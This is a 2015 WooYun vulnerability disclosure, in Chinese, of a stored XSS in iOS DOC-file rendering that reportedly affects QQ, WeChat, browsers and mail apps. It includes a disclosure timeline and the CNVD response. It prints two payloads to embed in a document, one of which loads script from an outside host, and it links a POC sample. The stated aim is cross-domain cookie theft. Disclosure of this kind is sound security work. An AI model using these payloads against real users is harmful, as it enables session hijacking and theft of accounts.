当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094791

漏洞标题:IOS全系统某处储存xss导致跨域命令执行(QQ、微信、浏览器、邮箱等中枪)

相关厂商:ios

漏洞作者: mango

提交时间:2015-01-30 20:54

修复时间:2015-05-05 11:38

公开时间:2015-05-05 11:38

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-30: 细节已通知厂商并且等待厂商处理中
2015-02-04: 厂商已经确认,细节仅向厂商公开
2015-02-07: 细节向第三方安全合作伙伴开放
2015-03-31: 细节向核心白帽子及相关领域专家公开
2015-04-10: 细节向普通白帽子公开
2015-04-20: 细节向实习白帽子公开
2015-05-05: 细节向公众公开

简要描述:


最后一次编辑,经过测试发现早在很久以前ios版本就存在了,可能存有很多年了,可以做到跨域命令执,可获取任意用户浏览网站cookie,危害非常大。
尖刀收小伙伴了~~
想了很久,还是提交乌云了,乌云曾经也是我学习的地方,是乌云让我成长,所以我认为不管怎样,人总要落叶归根的~ 滴水之恩应当涌泉相报~~~么么哒乌云~

详细说明:

一、详细说明:
在IOS 系统中 都默认可以打开DOC文件 包括QQ 微信 浏览器等等
那么我们需要构造一个含有xss的文档
如图
在DOC文档中插入 特殊字符code

}</style><script>alert(/xss/)</


然后保存 发送给好友 或者微信好友 打开就会被xss

@)_2)ZGKU8TL1I0KU)1YIBH.png


08B02CA66EBEE0E9A93A02B3087187E1.png


68D6897D104C403B48F40798BBF0A7DF.png


Z9H9M)[6@I8PGZUEL~4QV07.jpg


构造短地址(短地址首页改为xss)

}</style><script src=http://18.gy>


7_U8X7{0M%DO93FTGB4ED5K.png


我们打开构造好POC 我们可以选择插入邮件系统发送给受害者 受害者打开后如下

6E7B3D90505286B56331DB7CC319249D.png


所以可以跨域劫持用户cookie 包括命令执行等

漏洞证明:

IMG_0452.PNG


POC样本 http://yunpan.cn/cKYGNhw5N9s2T (提取码:6b5d)
特别感谢 0x_Jin 是他的漏洞给了我一些帮助和一些跟好的思维方式~~再次感谢。

修复方案:

版权声明:转载请注明来源 mango@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-02-04 11:36

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无